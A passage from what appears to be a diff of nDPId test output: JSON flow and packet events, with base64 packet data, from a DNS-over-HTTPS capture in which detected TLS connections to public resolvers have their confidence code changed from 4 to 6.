VUAXu9xkbB0O3nyNloM3\/1BpKJAhKkuU\/V2kkZGB6Ql\/kS7sAxcWh603OAJFGoXqcwc2spjFNCK4ea9Hs8PmACV\/UTaJ7lrlVw2HKBfFrLZE4S2HECqocWhjyVs89\/VZtJDOJu7pXlvP6vYnAZ+sKU9FZHgQ29hFtZTpOUnFJKyIZ7qR3IrvVPATpVytUzMEEVKArnVXT6TYqqci\/q+Ob0fbpe70cziyO7QaX7DT+VhBEhzijRbBVrFLadSpyh0XwKqeuShTd5lBEg4jq+0xz6QU3AR+JKO5yFNIu3wqn66JM48D8VfHh\/P6zoK25bt+h0uyMx2Tdvz0o8sXcXOlNbkjxJTj+b3L48sroz1OixQLEwkGWR0YALDiDYZDaGEdLMJeKpDENsvWGjQzbcLGtxojF3IPZE5plenMHHam99lQcz7tOMhTuD0tu9K1ubLwoOk+K9ZSx+jQ\/y8OgEHvmzPhQqCD3uYFzKXprY15BXYSgVl4JkFtCc53KhrIqQpwfu8AGb8d7NaM+YwOO8C5+0rvVtZQVjay20f9c8RH+m7E+z6+gghCL2zO42Qf0EGAmfsmAKXMp6WNxCrd7mkU+MupYWwFGBmLvHH3Vl5XVJZL0bTZyhceC5c2NC8KJ3G3fmI41pUyCIqBiCF4naOVVb20hz4J7t7d4+3vNMlh9pkutkDtBUG\/sopbYKTD6kxhRU0nbMYNcJYsotavdtxk+5ricax8dlXTEQUyVGuU7VzQro6ZTS2J\/N+Dqw0JjCzhzZM4Iy+Zigsyz452Mxwn4H+POZW9AEa8UJIqsMXNYUOgxqdRZORU8gjSaaYtyhn4ZgPLYzJWev+UYEVbkQQlIs0qMsnDALKCKs\/vPLbMaZzLaWAeXOQBcQn6dRdSl1OHdjVYou9K0wNLFmi57+vod9Ufwp9xSCvh3ThgMiLBs9ntZ+DKnnpNK7K++8wDuLBmnbcYEnUZrZqGa8EXM5oLFPSizN87UN+K45Q\/S\/mtl3uxWe3MQN2DDd0vZIT\/pM6xA4vmgKQKhOGh1G\/LsJ4bGVvyfPbVWvvPsPMrkNeqwnVRFRE+JcuPLjNn3DyJRPv6SImnNR3F3p3NDu+U\/bZYbpfAqdtebmwkI6E92\/4EaRwnMS8jUU+nm4J3KxRiQRAHf2ic3MpHIJFU1alZ3UsqHJ6ixFmoZGKJNMub9RVwhhoMDob7lsWG2+BH4aWefcCL1wBXs4NIWJsY2Ws638ztVCok6ObVcpsMJe2l2ribLtt6uLyB1eEKfooGXoxgtbiHn8UI8BDgLRXpCnA7qK7wNCPv\/hXV\/5qObuA7HW\/C2qkSIpV\/R39i9wwVQ1ug1QIQz\/Ivm\/r6WLd0npdZrGVu5GBOJgUSRjnZQS5nqzdQ7xc5efsR5ICHi2XulsD+Zl3WQXVxYViEQMZNQRJCVpPIcx8YSgUINm5M6giDWQvYaHGMiifN+4pLOGo7UDtXSoYcIPou4kTo7mt5yFzAggk8EG0TmExkKN5uy8guvzoGiu3UmP1ayFSZA5TF4Hxgcg+2NpMUwTAvYDD0pW884S8fOW9HXDNECKzwG\/oVVn5NMUQqNCBUKpIkrq4caPrR60LP1G1fKKVz2Mf14oxUS6BYWLwcRFuY6LigPfz3Ch2bE\/jL+itDz+psExENk+g1PfaK4go+YhsmYCnhhZtTocVAIm+qVANsaIE47+Mr\/3qaOf1rseYxdMsxv04vxWH70UAraH7Y4AGe1DhKm55YgPg2VNLv+h443L3JtfuQRH1c2k3TEXhdwCAcDQH9W699eTwV8ntiQTxjZssTXuxQRFgjLr00HeNPNF7n2H9VgT8LsXQAt4\/i29eoQanjq3bUca84pwERHpxJCf8pS1a1KaFzMXvwUcJQOHW0Q\/N1pQGzvCpgH08Dx9GmHQ9KyzJ\/25WSu25QUZfal6F7L79g8iREwvmDUfy2lEv7mGnvWdhk02quVGsRpK9
JEZQWo1rmsoDlNw4F7rXwD7R+U4RUfRyKkcbXPHiTg6YeMzcydsycniM9RaMjPPob9n1bk26ufx+9SlvlwwzqBTbOelsik5jIa525vbi5OIQxSrn0plookRa9xUJNwJ0omdn9j\/AW9IsSa86jM4scUrSMFbeKS4NfQDG9J4VYxzdoR7UNco77sa40\/zPWSa52BjRajNWVVhLj2o4JJQ1TdUu1\/Y89xmSzFKfGWeLSDj5A40mFHXGu4ywpzLC8Nndnau8G5aFKzcr\/e\/FYXUsoYZybTLRRgFBh9CldD2TTFeVueuq98o4ZVu+q1YYgsJKBwBBdV7ZQvj9\/cuG60fpzaNEiWJubkXSKKJvv74KXiPSXeDhQYLSS52OcrIzafNPniFrdcohvXMGEBoTJqcVbFo3+5iC13wm4mlmo+quy\/l2iSqCs4wxDhhSbLnO3Mj4Jo+xpM+BWcGCqCQkZM3XVKq9YiLnmUpBqToMdPk8pxszpPKZj1LhkprcBdvtCOBdOnwV08YRjPbT04P1DuRJXM7LDfWyxwk\/Is8GGMA1w6+\/RlaDUJ4QA8kKf62dGdodCfjoiQVkcxdXgak+xv+ho1izHEaG3Cxi3\/0JNNkwi2GYgruxc5fmKOdC4sqtkxC8j7I10mTh3+xdhudUBx0Sfr8yXq66S2KI88KrN3whtG4+sfGtAkvxG1DDMgti4zkfemFnlOATAqP5VRZM6U99yi4VhRBfczJTw1gBFetM1BkbvErs0YQl2nnzhNtTGtufXl2uHH4oKan\/xnak8wRRzvD04JQK431fn3TEvjjqMfQgcgW2JNC7Jyw7AYjY5nB5jUcAvogHpO11F1M9vRMop+cLQefP6yxy73IHNujTUtW4L99fDdjHVHLSrb7JdVLoGFBt3fFHLJFZwGyi73KaVuA8iLogqAdT6WIlJVQpMEOX0IGn7EhGzmKBzxPYnYlqqEBMEmrbIy10AsTQseVjaAzuWns\/HCPxtq5uB5ayh6r0SQlamctp8CNeSGkejLyD9InFUv\/cN6jEeAPw9ln90Uo+NcJcsUJLeRD+0uBhQVWKlzlgFrsdNHfyZgldWogT0yc5biAQ0YsfjTotPSED4mJ044\/CPZYxO\/WG1WatWJcgbBPZpTJOczqp0KaqRJnQpbibu0vaCcUf\/KqPXTh9mQWbhQvkie6BJSQGOWuxP4jMOKd9ZpnBr0kUhcDeMAPaBISZnWKXpcStlkCGJnAAKL5CAgF\/30XUkXB1LxIrTS74Ar8WfurKCvwBWG\/WZugVENhYI47kxJo12a6YH"} -00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304432,"flow_last_seen":946739304474,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3202,"flow_avg_l4_payload_len":1601,"midstream":1,"thread_ts_msec":946739304474,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304432,"flow_last_seen":946739304474,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3202,"flow_avg_l4_payload_len":1601,"midstream":1,"thread_ts_msec":946739304474,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
01589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":946739304474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":892,"pkt_l4_len":858,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAANu8ZFAADUG\/LG5X9oqCgAAAQG7xbYrbTJIao0RxFAYAfWPbQAAW0wo1H0j139pBXgBmTX+NlnQSaFEq5K3Pk3KVeGnXpOOLq4X08kQBuG8lGioiVe9QPOeM1XWvGxPlasRKFYrXBH86PGVaXAalDOEWJlV3PHRUUevw5fI6G+9XzuHkGZKTzPpIIOZ3iAzfHnVG3aTpqTBf7xHcc9kM1a8UHbmE4vJrXG9wa2HwWF2bcpsRjUYBUQxiid3MXG7FbSTEXHjqgO4LQdR6Xrrbq+Co3CdY49hyuqnRUiglv3ZkZvp\/BcnFskV9iJiOLBUK+jpAhnIdIbviFi78T5PQD4Tbyt8STzKJ4\/mkCRReunmywmmxKyYx8ErZcAkoKDR9IOJ3LCf8I8uzSUCcTKeSSnHS6ASYLDpWersQuLDgg3Is5Hb+2kMH37wQnKetidHgJqxmhLBaw+NX16ETkRc5vqPLeAmNQjzUjFZW029RGYPrEM\/M2aIcKp372plYpuhFsySXWIydCD9tqNCwZyquQ9nS3XV\/M4rQP8eJtxF8c+LbyHgf4cpoHUgBE4Qg\/rQ8QPjUfA1pwRPb\/2owpEEJi4RutXWP+JydB0D0ebOUJIyGUMSTIpJcFH2AKhLGUYE6NfckNeCzln4nEp2+qOXsbfMejtOZFyyhHVzHpRSbGA51CkajxcDAwEZGvKJBQnU\/r0Z9hIPhFlH3EC+7xZqS+s7+uQ2E96CDW5iU++SeFvwmMtUyG5rZZUMcBGpLzGamrlpIcWB85XVCU4gt4ssg9\/BdLmFwKiGqbmqVBGWt\/8gKtXdyHqS9eDrvNFNLvTrsxnC0XEzuTedB4Vu4WIaC7MUadYnyNgpkYSxjxFL6J71Xhm+92aoteroJN4zzFxDDd8rAkDnu1z+ZiBNnpB\/Gl8e1OMkCP6vsWHqZoCX9H9vn8tgHDIFyxXWqZDdxctsoUH7QrryxeYlvn1njblpv3w6tKj8ghJZAtQ3ko6UuvntUQvQpT48C+AbzDC+CMGpscAjbO2LKlP9fB1a9O37Dse31zOmm1FlQiiQCvlL1EpsgdEXAwMARSV8NSHQ2Cma7zLl9Np9i8ttiytzR2iGli71aKFmLcmNdXIXIfvH2D8Tx5IjanqSAuAMgykIOqh1u3rHE4swCwSQXoiMxQ=="} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946739304846,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739304846,"pkt":"REREREREZmZmZmZmCABFAAFKCqJAAL0GKn8KAAABM56TMtqaAbsV\/EiYhf03fVAYAfaIyQAAFgMBAR0BAAEZAwMDM0zFcZBVaq8jarHhMnn706tDCSlU6qIcSdmbVQbksCDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUcmVzb2x2ZXItZXUubGVsdXguZmkABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgp73dM21LptFd0ThW7be4\/uwlUqgVJQtqqMQYrFbmEGQ="} 
-00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
04708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946739304885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3185,"pkt_l4_len":3151,"thread_ts_msec":946739304885,"pkt":"ZmZmZmZmRERERERECABFAAxjgA1AADcGL\/sznpMyCgAAAQG72pqF\/Td9FfxJulAYAfWT4gAAFgMDAHoCAAB2AwOQkeJmPgfI+2\/Nb2YFPwnrh6xqnBenx5u8q1ZnyWqFbyDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76BMBAAAuACsAAgMEADMAJAAdACAildRAk\/Ii9q568Shy0jK1lY4Sb1nfErCeFDdP5ao6KBQDAwABARcDAwAkQtxzjO6Y1fKC\/+pxVLm\/ix+V3OPJ68RUn+6KLdAjN0rm7jqVFwMDCjCAB4dDMRsvk08LXpiehq\/g9vbt8WAZZyX0IwUW7zm2s2JxksqGXN7MA4aQXMsXbea79jo4WvO3p6dz8ckR6\/GSVEFX2o1gGE3SmFE8bI1yIk7FWs3aYgxYwqLKQEvbN1ogdjJ6GVf+z5kiMwtt12G5tdTf7rSfZ3NH6Yk4oM8Elpl9VtGpp2o0FPfY8QB0bMd4GPEVRd4k3sqTgevSs5A\/CC4vXXDNw8uBoNAhPcBJ041jkXgJVSYm9QwFsJI4LdQTSOvpWGu8g3Q7\/FqYiPFofKEmMJ\/qdjv4rC472QK9MBOUQREh1M+X1zwZya0Ac0YwCKyp0B6QV8x8ZfPc4YWcPVw\/CzcsYjigSbp5JV0L4gyAue9Gh6S3YYS9bSWcQ6OYfhcUgIVrottiHisZ3rFZLnhHY2SXkUzy2eOnD3Qi87\/nZ2OjGdHVYvM8Yu4DBGax+k0RD3dyn9+WKeU6QKdkf0bt\/mxpZ+gCW+joqGHWhH8T8mliVYu97Vp1QkdwgpRB7hXYN0Y6CGFsBPw4pzAHjVBFBgDGgx3FLp+jHtYGS4QJXS1JHRsP\/ek1Bjr6PmHXQaaRrJ7LWjgQKI7Gha0EZqsq38SOF+eicMwDFpzc3B+5eNIjmjJW4NSel0FytKTt9ojc0NWkn0EYaG0EgY6+6x2nvzg5YX9tM13wZT\/oz2Ot9pPHCaabuHca2dbfesbpNetZkot4ox97XYVrqgngmst1PfSQmtM98M5ptnPmd\/sO4Q2zmY5zCyE4gqZJ\/jBMttfXco2\/5avcH7mX5ejSI27aNnLJexzSKXQ+JaOKITzvIhr9MApYef8a6mxmBG7KvaOHtWpBt2xvsdwkyGKaTSFivERAQJ3qVVpBnDVBNegKy8yEp45YgbraKILphly37eCzmeR8+BDQHM0\/olAhROBUZh\/RONZXvUkl5SKTRjHC2xvJNaeZYZ+hmdzytY6JxtjOWIkXJWGOQ1NLnp8ApIWyE\/uNNjzCwSksu7oipiMjp9\/TYKv3dTCD+5Ol7BQVVV99RWf0LzZ8iQzJsQx4OWgFzyT+Rx7ZVNnTGOrqRbAycjVipQHP7zlio12QWc9UNzJCxesOye7ivdDzyOxpzywnD3v8hSp\/9zPmf\/3ENHJgy8O34UUO06MOahgiokayYgWdjmVbemjxT1TryYu0gDna\/E6EV3qm9EmJk3uwiz6F8MD8T978R+EclF8jScCvS+0rc0myMoeeGSKvHZ59\/bY\/8uMlpK\/glxn4tf2FrEjMiwTYfD\
/iCofxemvMkvC\/JJfgLtIuT4eRwYnzHY6tx9RKYdE3USzn4\/mm5qo5iJNIvjNV0kDlflg2at\/H0LoUPuAQDzKEIijJENcZ6pth1tAfPuzZbqzQybao7+N7tXszvfJs6XQ8U0IN8EKUruqqe63LmjAuODDmoGi5l1XKUHloz2N6Z0c6GOIMVwe3VD3oKEzis5\/IqukPTBIlPi3wM9hPvIjDsgqHeQuZwd0P2uGkmxxX+CQ\/eHLZcMkC6yXGIsoms\/DqqMmKImF+\/kg3KVbsOWynlp+qs+GRnuEe5Gwcck3bNanvNfRO2hnDlR3xxWpDeCDtY554dnKSdrEsmz56E3HZY7CS4xffa2qaRU9o8FE6oWceQ2YomJuE\/bMT3knxqniPrzl1K3GkigMh9J1i47zylUFJIasxWeeT4rnsrPdwO5pPpDZPDAhZZKqamf0Xxf7UyzOur5bQ0RGdSbDmjCGZUxwrcQgCzOocJ07C3y9f5\/cPHLy4Hcpi9nKHy5+zMgLxDuHh45d7g5aX2opBYeDFdZVkS35fhN\/VA5YDY3hjQkRRPMbthZpOOEiiUTiyQGuttf7SmNH1qqd0+P4R98lk6wmtu\/RYPzzoAOrY33Oweyfv45FrUJjxFb3dkB2JJBL+a3b7QXiEHk+jfi2DFJC8R1nDmEiD7lG0zp+GgCp2hMKrzTinc3jq7XrvSXgjRArW5vMll4UVtkgCZOG8JOPCJ+1InS6ZkzsHBlVE1ulhcQ6O07QOIetMX\/TQcpOws1Y3zI6xlDo7QN9RXjghTw1OQy\/e7csIpoqCDP+zQIn4uVNd9knXoZalNv0Vl+aMYpSUZU7SqXuPd5TrgUjyDCp5uSeJ7PvFxTrvq2m\/J4PCA00dz61blph4TnR5jqkjnWkPCWysgjmFP6jSXDVhi7OEYKJ3O5rj9s1KlWrTAKqEQ1WqkKpYs5zhjZX8C2jJXc7kR7CLzfiUXF\/NgCKD1oPTUZ3B8\/5yhnRignY4ZXMdGmmpuO\/YtIw9z3hTG2mvGzyDH+lTissPE7qvJQZpSJa3YSyfqgptZgRRY3rqQwM1Uan0WZB\/VyeZi71E8HGjmCdytjr1tbuT47siLcnpw\/tnXbVcW0DRQa0UluCuUeRWsFfgTuUhjuWHPeilVqW8TKVGxmd00ikgPoQa60hulHvmRZ5KO6vzi71RXX6dL\/wcA9t7hqc08oZMCG7pFOGbkwZ0H2Ou1cGKyFuTh2P28nKV1VsXeJy03j0rMepvwRePH7BjQM109D5zTvZ+x9U7LeeU5p\/97XLGVSvHyU6QoAkvI7FvvpHkTyoqhk2wuau1Ks3W6ziSuG5ItHrlZeoz2vdhzoVB+PdecdxLzV339b9A3nHa+rng\/3RfrU7m\/xV1uGOltE\/q6T8zbMwllfgMWQHWJtalokkS691O3vXWaxSb0GH3Eukn2GTLqT7xyn8hsg3I5F5pOCMspm6GHKCedNXQt\/rOrbG+70oNkLEiqOTucHrzdm7u3q9vZm5H7InHwwhmYB9o+wmMx9CpSsan17Eu6kQzONsC+k776iKm10F9TFCFRzcFvoSkJVRCogWUna5X6unZPh90yhZj+joK9OmDYl3uGf3cxeeYhuWr7BFipgMV88P5BfhbMuQJTiRkmE2tdVLKXiJJMT3RIuLttxViwKIZxqrsBPVZWuFgeoB\/tNKx1MPoFMSkd6Ady\/JPiKCd\/Lo+LSa+EGciXu3JhsD37LOO\/iaE1hxwYGWesFtcRBD82I4gt\/VZ4IZMSaNKHgm65E6lCcq41BJ\/gbuCDCFJ47l5UE8QhYSOHmp5J9j5vA1FjZFm5Iv6VRZaegnWKKRCmp+e5pBYWdf4T92iFA3wkmAojnbzcZPXM1FL7vahyaLx6fEfTzbYntPyfIJ2l5KJE855FQl1WRsib7X80Yvtknk5W4cHEv1yr1kjUU2CGJ8WMhJhi5rps9ncDKvd4PP0dTr
H0ia8H78o1K4OYwHp0nPI0tpDBJqSO906qPhy7pON78NLR8NLi7ebyinTbjqYrIeAPW0BcPQXfo+ePTRQEGlW7G5LCAYlQCvO5j\/LMgF9c3iJwt3nUbOE+eqHvK0\/PHJmQK+ijLfXFLdBd6NBQSn3sHF\/qzgQRE5VwfSRmK55bFmg0PCiTnhGTWzfK0OvOvyyAAiwvXCaBV+gFnzKnwwQ+4ebBmLMgQpqYGGOrzwhV7P+RvbAFwMDARmYqpARsWX06T7\/aIqUa3gqpszdt6QdkNXpjrjP\/CtX9C+2AHbAmlDaq+eynMum8sDVzFoKFvQfGpt91s0+c4BcfaWSQDicP6abNOaMq+Hp75lMfIATEOyO9cUpGtsxdjbO98fR3ligfvynTicYTBBKOabjGzsvGqpIQNsc6yP7ec1DM5IvytEF3WMD\/BSWfSyCMBkPc77J1iCDteQqYtaAe0whPDVMG6GGDORujY8TM3L19IZL3YvYjw7AjSCmeKp+dThVSFL7D\/ks2Bt12v6Pc4J\/bL1kxAzO4vYx1vazs5rxcAfFBrI00UuE4UKrW1AuFrQrWAmy8gFVgJ7l+nCzCeDoyrV14OgMNuqUXIpirZiejq2fhnoXshcDAwA1MiDkD+m6EfUtBdx\/Pyl0ehgKaB76+ayZoBt6uEP7tnUDn+hUUsmcN7NZ1IZhFxhyx2uKd6w="} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304846,"flow_last_seen":946739304885,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":3421,"flow_avg_l4_payload_len":1710,"midstream":1,"thread_ts_msec":946739304885,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304846,"flow_last_seen":946739304885,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":3421,"flow_avg_l4_payload_len":1710,"midstream":1,"thread_ts_msec":946739304885,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":946739304887,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739304887,"pkt":"REREREREZmZmZmZmCABFAABoCqRAAL0GK18KAAABM56TMtqaAbsV\/Em6hf1DuFAYAfWH5wAAFAMDAAEBFwMDADVGrMk33Jx9u4V9oT8gk9T3N9siooKVMszOs96zlvjMst5cKF\/6mDE\/X3tfb1uyKq+NLUpVEQ=="} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946739305016,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739305016,"pkt":"REREREREZmZmZmZmCABFAAFIJYRAAL0Ggi8KAAABuf2aQugMAbv\/W2fgE34PaFAYAfYWNwAAFgMBARsBAAEXAwO7rF9fivBYq0PPnnVftpI5xv63Wth8iDXYIbCI66xBbCCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zZXMuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIHdlaU8VTQtoxOo631cPtMLo1fhD\/NP8\/WHh2FCfWmp6"} 
-00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 